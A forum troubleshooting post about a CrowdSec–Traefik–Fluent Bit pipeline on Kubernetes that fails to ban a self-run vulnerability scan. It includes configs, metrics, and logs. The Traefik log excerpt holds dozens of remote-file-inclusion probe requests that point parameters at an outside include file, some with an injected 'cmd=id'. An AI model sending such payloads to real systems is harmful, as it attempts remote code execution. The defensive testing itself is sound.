Hello,
First of all, thanks for the traefik collection!
It took me a while but I managed to send Traefik logs to Crowdsec agent via Fluentbit and Syslog.
To verify the whole pipeline, through a vpn, I used both wapiti and nikto to pentest to the domain. To verify the syslog input I send the syslog both to the server and my dev machine. Though, after quite some tests, I never managed to be ban. Can someone help me found why?
To set the context, Iβm working on kubernetes, and I have already publish a couples of my manifests on this post.
By the way, for syslog, the tag βappnameβ seems to be mandatory to work (Maybe other tags too?) but itβs not written. Did I missed it in the doc? Or itβs usually mandatory? I litteraly discovered what a syslog server is, so maybe Iβm missing something.
To install the traefik collection I have added the following line in the env config file:
COLLECTIONS: "crowdsecurity/traefik crowdsecurity/linux crowdsecurity/sshd"
To install fluentbit, Iβve used the helm chart with this pipeline configuration:
## https://docs.fluentbit.io/manual/pipeline/inputs
inputs: |
[INPUT]
Name tail
Path /var/log/containers/*.log
multiline.parser docker, cri
Tag kube.*
Mem_Buf_Limit 5MB
Skip_Long_Lines On
[INPUT]
Name systemd
Tag host.*
Systemd_Filter _SYSTEMD_UNIT=kubelet.service
Read_From_Tail On
[INPUT]
name node_exporter_metrics
tag node_metrics
scrape_interval 5
## https://docs.fluentbit.io/manual/pipeline/filters
filters: |
[FILTER]
Name kubernetes
Match kube.*
Merge_Log On
Keep_Log Off
K8S-Logging.Parser On
K8S-Logging.Exclude On
## Duplicate kubernetes key
[FILTER]
Name modify
Match kube.*
Hard_copy kubernetes kubernetes_sd_key
## Unnested kubernetes properties
[FILTER]
Name nest
Match kube.*
Operation lift
Nested_under kubernetes_sd_key
Add_prefix kubernetes_
## https://docs.fluentbit.io/manual/pipeline/outputs
outputs: |
[OUTPUT]
name syslog
match kube.var.log.containers.traefik*
host crowdsec-agent.kube-system
port 514
mode udp
syslog_format rfc5424
syslog_maxsize 2048
syslog_appname_key kubernetes_container_name
syslog_hostname_key kubernetes_host
syslog_procid_key kubernetes_pod_name
syslog_sd_key kubernetes
syslog_message_key log
[OUTPUT]
name syslog
match kube.var.log.containers.traefik*
host 192.168.1.80
port 8514
mode udp
syslog_format rfc5424
syslog_maxsize 2048
syslog_appname_key kubernetes_container_name
syslog_hostname_key kubernetes_host
syslog_procid_key kubernetes_pod_name
syslog_msgid_key kubernetes_time
syslog_sd_key kubernetes
syslog_message_key log
To start the syslog Data Source with crowdsec, I have this config :
apiVersion: v1
kind: ConfigMap
metadata:
name: crowdsec-agent-files-conf
namespace: kube-system
data:
acquis.yaml: |
source: syslog
listen_addr: 0.0.0.0
listen_port: 514
max_message_len: 2048
labels:
type: syslog
The crowdsec-agent container start up logs:
$ kubectl -n kube-system logs crowdsec-agent-f4cc5db9c-nd5lp
Regenerate local agent credentials
time="12-12-2021 06:05:01 PM" level=info msg="machine 'localhost' deleted successfully"
time="12-12-2021 06:05:01 PM" level=info msg="Machine 'localhost' successfully added to the local API"
time="12-12-2021 06:05:01 PM" level=info msg="API credentials dumped to '/etc/crowdsec/local_api_credentials.yaml'"
Check if lapi need to register automatically an agent
time="12-12-2021 06:05:01 PM" level=info msg="Wrote new 188652 bytes index to /etc/crowdsec/hub/.index.json"
time="12-12-2021 06:05:02 PM" level=info msg="crowdsecurity/linux : up-to-date"
time="12-12-2021 06:05:02 PM" level=info msg="Item 'crowdsecurity/linux' is up-to-date"
time="12-12-2021 06:05:02 PM" level=info msg="Run 'sudo systemctl reload crowdsec' for the new configuration to be effective."
time="12-12-2021 06:05:02 PM" level=info msg="crowdsecurity/whitelists : up-to-date"
time="12-12-2021 06:05:02 PM" level=info msg="Item 'crowdsecurity/whitelists' is up-to-date"
time="12-12-2021 06:05:02 PM" level=info msg="Run 'sudo systemctl reload crowdsec' for the new configuration to be effective."
time="12-12-2021 06:05:02 PM" level=warning msg="crowdsecurity/docker-logs : overwrite"
time="12-12-2021 06:05:02 PM" level=info msg="Enabled crowdsecurity/docker-logs"
time="12-12-2021 06:05:02 PM" level=info msg="Run 'sudo systemctl reload crowdsec' for the new configuration to be effective."
time="12-12-2021 06:05:02 PM" level=warning msg="crowdsecurity/traefik-logs : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/http-logs : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/http-crawl-non_statics : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/http-probing : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/http-bad-user-agent : overwrite"
time="12-12-2021 06:05:03 PM" level=info msg="downloading data 'https://raw.githubusercontent.com/crowdsecurity/sec-lists/master/web/bad_user_agents.txt' in '/var/lib/crowdsec/data/bad_user_agents.txt'"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/http-path-traversal-probing : overwrite"
time="12-12-2021 06:05:03 PM" level=info msg="downloading data 'https://raw.githubusercontent.com/crowdsecurity/sec-lists/master/web/path_traversal.txt' in '/var/lib/crowdsec/data/http_path_traversal.txt'"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/http-sensitive-files : overwrite"
time="12-12-2021 06:05:03 PM" level=info msg="downloading data 'https://raw.githubusercontent.com/crowdsecurity/sec-lists/master/web/sensitive_data.txt' in '/var/lib/crowdsec/data/sensitive_data.txt'"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/http-sqli-probing : overwrite"
time="12-12-2021 06:05:03 PM" level=info msg="downloading data 'https://raw.githubusercontent.com/crowdsecurity/sec-lists/master/web/sqli_probe_patterns.txt' in '/var/lib/crowdsec/data/sqli_probe_patterns.txt'"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/http-xss-probing : overwrite"
time="12-12-2021 06:05:03 PM" level=info msg="downloading data 'https://raw.githubusercontent.com/crowdsecurity/sec-lists/master/web/xss_probe_patterns.txt' in '/var/lib/crowdsec/data/xss_probe_patterns.txt'"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/http-backdoors-attempts : overwrite"
time="12-12-2021 06:05:03 PM" level=info msg="downloading data 'https://raw.githubusercontent.com/crowdsecurity/sec-lists/master/web/backdoors.txt' in '/var/lib/crowdsec/data/backdoors.txt'"
time="12-12-2021 06:05:03 PM" level=warning msg="ltsich/http-w00tw00t : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/http-generic-bf : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/http-open-proxy : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/base-http-scenarios : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/base-http-scenarios : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/traefik : overwrite"
time="12-12-2021 06:05:03 PM" level=info msg="/etc/crowdsec/collections/base-http-scenarios.yaml already exists."
time="12-12-2021 06:05:03 PM" level=info msg="/etc/crowdsec/collections/traefik.yaml already exists."
time="12-12-2021 06:05:03 PM" level=info msg="Enabled crowdsecurity/traefik"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/syslog-logs : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/geoip-enrich : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/dateparse-enrich : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/sshd-logs : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/ssh-bf : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/ssh-slow-bf : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/sshd : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/sshd : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/linux : overwrite"
time="12-12-2021 06:05:03 PM" level=info msg="/etc/crowdsec/collections/sshd.yaml already exists."
time="12-12-2021 06:05:03 PM" level=info msg="/etc/crowdsec/collections/linux.yaml already exists."
time="12-12-2021 06:05:03 PM" level=info msg="Enabled crowdsecurity/linux"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/sshd-logs : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/ssh-bf : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/ssh-slow-bf : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/sshd : overwrite"
time="12-12-2021 06:05:03 PM" level=info msg="/etc/crowdsec/collections/sshd.yaml already exists."
time="12-12-2021 06:05:03 PM" level=info msg="Enabled crowdsecurity/sshd"
time="12-12-2021 06:05:03 PM" level=info msg="Run 'sudo systemctl reload crowdsec' for the new configuration to be effective."
time="12-12-2021 18:05:03" level=info msg="Crowdsec v1.2.1-docker-dd03d073558e380c283afe66942f537c3da647ff"
time="12-12-2021 18:05:03" level=info msg="Loading prometheus collectors"
time="12-12-2021 18:05:03" level=info msg="Loading CAPI pusher"
time="12-12-2021 18:05:03" level=info msg="initiating plugin broker"
time="12-12-2021 18:05:03" level=debug msg="starting plugin" args="[/usr/local/lib/crowdsec/plugins/notification-http]" path=/usr/local/lib/crowdsec/plugins/notification-http
time="12-12-2021 18:05:03" level=debug msg="plugin started" path=/usr/local/lib/crowdsec/plugins/notification-http pid=83
time="12-12-2021 18:05:03" level=debug msg="waiting for RPC address" path=/usr/local/lib/crowdsec/plugins/notification-http
time="12-12-2021 18:05:03" level=debug msg="using plugin" version=1
time="12-12-2021 18:05:03" level=debug msg="plugin address" @module=http-plugin address=/tmp/plugin170019443 network=unix
time="12-12-2021 18:05:03" level=trace msg="waiting for stdio data"
time="12-12-2021 18:05:03" level=info msg="registered plugin http_default"
time="12-12-2021 18:05:03" level=info msg="initiated plugin broker"
time="12-12-2021 18:05:03" level=info msg="start crowdsec api push (interval: 30s)"
time="12-12-2021 18:05:03" level=info msg="start crowdsec api pull (interval: 2h)"
time="12-12-2021 18:05:03" level=warning msg="scenario list is empty, will not pull yet"
time="12-12-2021 18:05:03" level=info msg="Loading grok library /etc/crowdsec/patterns"
time="12-12-2021 18:05:04" level=info msg="capi metrics: metrics sent successfully"
time="12-12-2021 18:05:04" level=info msg="start crowdsec api send metrics (interval: 30m)"
time="12-12-2021 18:05:05" level=info msg="Loading enrich plugins"
time="12-12-2021 18:05:05" level=info msg="Successfully registered enricher 'GeoIpCity'"
time="12-12-2021 18:05:05" level=info msg="Successfully registered enricher 'GeoIpASN'"
time="12-12-2021 18:05:05" level=info msg="Successfully registered enricher 'IpToRange'"
time="12-12-2021 18:05:05" level=info msg="Successfully registered enricher 'reverse_dns'"
time="12-12-2021 18:05:05" level=info msg="Successfully registered enricher 'ParseDate'"
time="12-12-2021 18:05:05" level=info msg="Loading parsers 8 stages"
time="12-12-2021 18:05:05" level=info msg="Loaded 1 parser nodes" file=/etc/crowdsec/parsers/s00-raw/docker-logs.yaml
time="12-12-2021 18:05:05" level=info msg="Loaded 2 parser nodes" file=/etc/crowdsec/parsers/s00-raw/syslog-logs.yaml
time="12-12-2021 18:05:05" level=info msg="Loaded 1 parser nodes" file=/etc/crowdsec/parsers/s01-parse/sshd-logs.yaml
time="12-12-2021 18:05:05" level=info msg="Loaded 1 parser nodes" file=/etc/crowdsec/parsers/s01-parse/traefik-logs.yaml
time="12-12-2021 18:05:05" level=info msg="Loaded 1 parser nodes" file=/etc/crowdsec/parsers/s02-enrich/dateparse-enrich.yaml
time="12-12-2021 18:05:05" level=info msg="Loaded 1 parser nodes" file=/etc/crowdsec/parsers/s02-enrich/geoip-enrich.yaml
time="12-12-2021 18:05:05" level=info msg="Loaded 1 parser nodes" file=/etc/crowdsec/parsers/s02-enrich/http-logs.yaml
time="12-12-2021 18:05:05" level=info msg="Loaded 1 parser nodes" file=/etc/crowdsec/parsers/s02-enrich/whitelists.yaml
time="12-12-2021 18:05:05" level=info msg="Loaded 9 nodes, 3 stages"
time="12-12-2021 18:05:05" level=info msg="Loading postoverflow Parsers"
time="12-12-2021 18:05:05" level=info msg="Loaded 0 nodes, 0 stages"
time="12-12-2021 18:05:05" level=info msg="Loading 13 scenario files"
time="12-12-2021 18:05:05" level=info msg="Adding trigger bucket" cfg=bold-darkness file=/etc/crowdsec/scenarios/http-open-proxy.yaml name=crowdsecurity/http-open-proxy
time="12-12-2021 18:05:05" level=info msg="Adding leaky bucket" cfg=snowy-butterfly file=/etc/crowdsec/scenarios/http-generic-bf.yaml name=crowdsecurity/http-generic-bf
time="12-12-2021 18:05:05" level=info msg="Adding leaky bucket" cfg=autumn-cherry file=/etc/crowdsec/scenarios/http-sensitive-files.yaml name=crowdsecurity/http-sensitive-files
time="12-12-2021 18:05:05" level=info msg="Adding leaky bucket" cfg=misty-sunset file=/etc/crowdsec/scenarios/http-bad-user-agent.yaml name=crowdsecurity/http-bad-user-agent
time="12-12-2021 18:05:05" level=info msg="Adding leaky bucket" cfg=cold-tree file=/etc/crowdsec/scenarios/http-crawl-non_statics.yaml name=crowdsecurity/http-crawl-non_statics
time="12-12-2021 18:05:05" level=info msg="Adding leaky bucket" cfg=floral-fire file=/etc/crowdsec/scenarios/http-xss-probing.yaml name=crowdsecurity/http-xss-probbing
time="12-12-2021 18:05:05" level=info msg="Adding leaky bucket" cfg=aged-cherry file=/etc/crowdsec/scenarios/http-backdoors-attempts.yaml name=crowdsecurity/http-backdoors-attempts
time="12-12-2021 18:05:05" level=info msg="Adding leaky bucket" cfg=little-mountain file=/etc/crowdsec/scenarios/http-sqli-probing.yaml name=crowdsecurity/http-sqli-probbing-detection
time="12-12-2021 18:05:05" level=info msg="Adding trigger bucket" cfg=young-wind file=/etc/crowdsec/scenarios/http-w00tw00t.yaml name=ltsich/http-w00tw00t
time="12-12-2021 18:05:05" level=info msg="Adding leaky bucket" cfg=icy-wave file=/etc/crowdsec/scenarios/ssh-slow-bf.yaml name=crowdsecurity/ssh-slow-bf
time="12-12-2021 18:05:05" level=info msg="Adding leaky bucket" cfg=shy-mountain file=/etc/crowdsec/scenarios/ssh-slow-bf.yaml name=crowdsecurity/ssh-slow-bf_user-enum
time="12-12-2021 18:05:05" level=info msg="Adding leaky bucket" cfg=small-firefly file=/etc/crowdsec/scenarios/ssh-bf.yaml name=crowdsecurity/ssh-bf
time="12-12-2021 18:05:05" level=info msg="Adding leaky bucket" cfg=rough-lake file=/etc/crowdsec/scenarios/ssh-bf.yaml name=crowdsecurity/ssh-bf_user-enum
time="12-12-2021 18:05:05" level=info msg="Adding leaky bucket" cfg=solitary-firefly file=/etc/crowdsec/scenarios/http-path-traversal-probing.yaml name=crowdsecurity/http-path-traversal-probing
time="12-12-2021 18:05:05" level=info msg="Adding leaky bucket" cfg=spring-rain file=/etc/crowdsec/scenarios/http-probing.yaml name=crowdsecurity/http-probing
time="12-12-2021 18:05:05" level=warning msg="Loaded 15 scenarios"
time="12-12-2021 18:05:05" level=info msg="loading acquisition file : /configMap/acquis.yaml"
time="12-12-2021 18:05:05" level=info msg="Starting syslog datasource configuration" type=syslog
time="12-12-2021 18:05:05" level=warning msg="Starting processing data"
time="12-12-2021 18:05:05" level=info msg="127.0.0.1 - [Sun, 12 Dec 2021 18:05:05 CET] \"POST /v1/watchers/login HTTP/1.1 200 151.803514ms \"crowdsec/v1.2.1-docker-dd03d073558e380c283afe66942f537c3da647ff\" \""
time="12-12-2021 18:05:05" level=info msg="last CAPI pull is newer than 1h30, skip."
time="12-12-2021 18:05:05" level=info msg="127.0.0.1 - [Sun, 12 Dec 2021 18:05:05 CET] \"POST /v1/watchers/login HTTP/1.1 200 145.725626ms \"crowdsec/v1.2.1-docker-dd03d073558e380c283afe66942f537c3da647ff\" \""
To double check that data where send to crowdsec agent, I used the cli with following result:
/ # cscli metrics
INFO[12-12-2021 05:41:22 PM] Buckets Metrics:
+--------------------------------------+---------------+-----------+--------------+--------+---------+
| BUCKET | CURRENT COUNT | OVERFLOWS | INSTANCIATED | POURED | EXPIRED |
+--------------------------------------+---------------+-----------+--------------+--------+---------+
| crowdsecurity/http-crawl-non_statics | - | - | 10 | 17 | 10 |
| crowdsecurity/http-probing | 1 | - | 3 | 9 | 2 |
+--------------------------------------+---------------+-----------+--------------+--------+---------+
INFO[12-12-2021 05:41:22 PM] Acquisition Metrics:
+-------------------+------------+--------------+----------------+------------------------+
| SOURCE | LINES READ | LINES PARSED | LINES UNPARSED | LINES POURED TO BUCKET |
+-------------------+------------+--------------+----------------+------------------------+
| syslog:10.42.1.92 | 2350 | 194 | 2156 | 1 |
| syslog:10.42.1.93 | 20 | 20 | - | - |
| syslog:10.42.1.94 | 2733 | 431 | 2302 | 25 |
+-------------------+------------+--------------+----------------+------------------------+
INFO[12-12-2021 05:41:22 PM] Parser Metrics:
+----------------------------------------+-------+--------+----------+
| PARSERS | HITS | PARSED | UNPARSED |
+----------------------------------------+-------+--------+----------+
| child-child-crowdsecurity/traefik-logs | 57954 | 13374 | 44580 |
| child-crowdsecurity/http-logs | 1935 | 1130 | 805 |
| child-crowdsecurity/traefik-logs | 9561 | 645 | 8916 |
| crowdsecurity/dateparse-enrich | 645 | 645 | - |
| crowdsecurity/geoip-enrich | 645 | 645 | - |
| crowdsecurity/http-logs | 645 | 485 | 160 |
| crowdsecurity/syslog-logs | 5103 | 5103 | - |
| crowdsecurity/traefik-logs | 5103 | 645 | 4458 |
| crowdsecurity/whitelists | 645 | 645 | - |
+----------------------------------------+-------+--------+----------+
INFO[12-12-2021 05:41:22 PM] Local Api Metrics:
+--------------------+--------+------+
| ROUTE | METHOD | HITS |
+--------------------+--------+------+
| /v1/alerts | GET | 625 |
| /v1/decisions | GET | 1312 |
| /v1/watchers/login | POST | 1526 |
+--------------------+--------+------+
INFO[12-12-2021 05:41:22 PM] Local Api Machines Metrics:
+-----------+------------+--------+------+
| MACHINE | ROUTE | METHOD | HITS |
+-----------+------------+--------+------+
| localhost | /v1/alerts | GET | 625 |
+-----------+------------+--------+------+
INFO[12-12-2021 05:41:22 PM] Local Api Bouncers Metrics:
+-----------------+---------------+--------+------+
| BOUNCER | ROUTE | METHOD | HITS |
+-----------------+---------------+--------+------+
| traefik-bouncer | /v1/decisions | GET | 1312 |
+-----------------+---------------+--------+------+
INFO[12-12-2021 05:41:22 PM] Local Api Bouncers Decisions:
+-----------------+---------------+-------------------+
| BOUNCER | EMPTY ANSWERS | NON-EMPTY ANSWERS |
+-----------------+---------------+-------------------+
| traefik-bouncer | 1310 | 2 |
+-----------------+---------------+-------------------+
The command to check decisions:
$ kubectl -n kube-system exec -it crowdsec-agent-f4cc5db9c-nd5lp -- sh
/ # cscli decisions list
No active decisions
/ #
A sample of traefik logs while wapiti was running:
$ kubectl logs -fn kube-system traefik-9f79b8c4c-mlvlm
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /noticias.php?inc=http://cirt.net/rfiinc.txt?? HTTP/1.1" - - "-" "-" 14939 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /nucleus/plugins/skinfiles/index.php?DIR_LIBS=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14940 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /nuke_path/iframe.php?file=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14941 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /nukebrowser.php?filnavn=http://cirt.net/rfiinc.txt?&filhead=XXpathXX&cmd=id HTTP/1.1" - - "-" "-" 14942 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14943 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://cirt.net/rfiinc.txt?? HTTP/1.1" - - "-" "-" 14944 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /oaboard_en/forum.php?inc=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14945 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /ocp-103/index.php?req_path=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14946 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /ocs/include/footer.inc.php?fullpath=http://cirt.net/rfiinc.txt?? HTTP/1.1" - - "-" "-" 14947 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /ocs/include/theme.inc.php?fullpath=http://cirt.net/rfiinc.txt?? HTTP/1.1" - - "-" "-" 14948 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /ocs/openemr-2.8.2/custom/import_xml.php?srcdir=http://cirt.net/rfiinc.txt?? HTTP/1.1" - - "-" "-" 14949 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /olbookmarks-0.7.4/themes/test1.php?http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14950 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /oneadmin/adminfoot.php?path[docroot]=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14951 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /oneadmin/blogger/sampleblogger.php?path[docroot]=http://cirt.net/rfiinc.txt?? HTTP/1.1" - - "-" "-" 14952 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /oneadmin/config-bak.php?include_once=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14953 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /oneadmin/config.php?path[docroot]=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14954 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:45 +0000] "GET /oneadmin/ecommerce/sampleecommerce.php?path[docroot]=http://cirt.net/rfiinc.txt?? HTTP/1.1" - - "-" "-" 14955 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:45 +0000] "GET /online.php?config[root_ordner]=http://cirt.net/rfiinc.txt??&cmd=id HTTP/1.1" - - "-" "-" 14956 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:45 +0000] "GET /open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=http://cirt.net/rfiinc.txt?? HTTP/1.1" - - "-" "-" 14957 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:45 +0000] "GET /openi-admin/base/fileloader.php?config[openi_dir]=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14958 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:45 +0000] "GET /openrat/themes/default/include/html/insert.inc.php?tpl_dir=http://cirt.net/rfiinc.txt???? HTTP/1.1" - - "-" "-" 14959 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:45 +0000] "GET /opensurveypilot/administration/user/lib/group.inc.php?cfgPathToProjectAdmin=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14960 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:45 +0000] "GET /ops/gals.php?news_file=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14961 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:45 +0000] "GET /order/login.php?svr_rootscript=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14962 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:45 +0000] "GET /osData/php121/php121db.php?php121dir=http://cirt.net/rfiinc.txt?%00 HTTP/1.1" - - "-" "-" 14963 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:45 +0000] "GET /ossigeno-suite-2.2_pre1/upload/xax/admin/modules/uninstall_module.php?level=http://cirt.net/rfiinc.txt?? HTTP/1.1" - - "-" "-" 14964 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:45 +0000] "GET /ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=http://cirt.net/rfiinc.txt?? HTTP/1.1" - - "-" "-" 14965 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:45 +0000] "GET /owimg.php3?path=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14966 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:45 +0000] "GET /p-news.php?pn_lang=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14967 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:45 +0000] "GET /pafiledb/includes/pafiledb_constants.php?module_root_path=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14968 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:45 +0000] "GET /page.php?goto=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14969 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:46 +0000] "GET /page.php?id=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14970 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:46 +0000] "GET /panel/common/theme/default/header_setup.php?path[docroot]=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14971 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:46 +0000] "GET /param_editor.php?folder=http://cirt.net/rfiinc.txt?? HTTP/1.1" - - "-" "-" 14972 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:46 +0000] "GET /parse/parser.php?WN_BASEDIR=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14973 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:46 +0000] "GET /patch/?language_id=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14974 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:46 +0000] "GET /patch/tools/send_reminders.php?noSet=0&includedir=http://cirt.net/rfiinc.txt?? HTTP/1.1" - - "-" "-" 14975 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:46 +0000] "GET /paypalipn/ipnprocess.php?INC=http://cirt.net/rfiinc.txt?? HTTP/1.1" - - "-" "-" 14976 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:46 +0000] "GET /pda/pda_projects.php?offset=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14977 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:46 +0000] "GET /phfito/phfito-post?SRC_PATH=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14978 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:46 +0000] "GET /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14979 "-" "-" 0ms
Here a sample of syslog send to my dev machine , according to fluentbit should be the same as ones send to crowdsec agent:
$ nc -u -l 8514
<14>1 2021-12-12T16:43:47.848158Z windell traefik traefik-9f79b8c4c-mlvlm - [kubernetes pod_name="traefik-9f79b8c4c-mlvlm" namespace_name="kube-system" pod_id="7818a1e6-eacd-476e-b6e0-e39d82f0432b" host="windell" container_name="traefik" docker_id="ee98498d62970b7ae9c8d91baca7bf5558922c5da490113b814883601a0306bd" container_hash="docker.io/library/traefik@sha256:ea0aa8832bfd08369166baecd40b35fc58979df8f5dc5182e4e63ee6adbe66db" container_image="docker.io/library/traefik:2.2.11"] ο»Ώ10.42.1.1 - - [12/Dec/2021:16:43:47 +0000] "GET /ping HTTP/1.1" 200 2 "-" "-" 17623 "ping@internal" "-" 0ms<14>1 2021-12-12T16:43:48.267831Z windell traefik traefik-9f79b8c4c-mlvlm - [kubernetes pod_name="traefik-9f79b8c4c-mlvlm" namespace_name="kube-system" pod_id="7818a1e6-eacd-476e-b6e0-e39d82f0432b" host="windell" container_name="traefik" docker_id="ee98498d62970b7ae9c8d91baca7bf5558922c5da490113b814883601a0306bd" container_hash="docker.io/library/traefik@sha256:ea0aa8832bfd08369166baecd40b35fc58979df8f5dc5182e4e63ee6adbe66db" container_image="docker.io/library/traefik:2.2.11"] ο»Ώ194.34.132.19 - - [12/Dec/2021:16:43:48 +0000] "GET /zqxjFASpplgsBq.html HTTP/1.1" 404 153 "-" "-" 17624 "frigg-public-routes-22735e324d6d7eb80733@kubernetescrd" "http://10.42.1.239:80" 23ms<14>1 2021-12-12T16:43:48.595967Z windell traefik traefik-9f79b8c4c-mlvlm - [kubernetes pod_name="traefik-9f79b8c4c-mlvlm" namespace_name="kube-system" pod_id="7818a1e6-eacd-476e-b6e0-e39d82f0432b" host="windell" container_name="traefik" docker_id="ee98498d62970b7ae9c8d91baca7bf5558922c5da490113b814883601a0306bd" container_hash="docker.io/library/traefik@sha256:ea0aa8832bfd08369166baecd40b35fc58979df8f5dc5182e4e63ee6adbe66db" container_image="docker.io/library/traefik:2.2.11"] ο»Ώ194.34.132.19 - - [12/Dec/2021:16:43:48 +0000] "GET / HTTP/1.1" 200 4646 "-" "-" 17625 "frigg-public-routes-22735e324d6d7eb80733@kubernetescrd" "http://10.42.1.239:80" 18ms<14>1 2021-12-12T16:43:48.697812Z windell traefik traefik-9f79b8c4c-mlvlm - [kubernetes pod_name="traefik-9f79b8c4c-mlvlm" namespace_name="kube-system" pod_id="7818a1e6-eacd-476e-b6e0-e39d82f0432b" 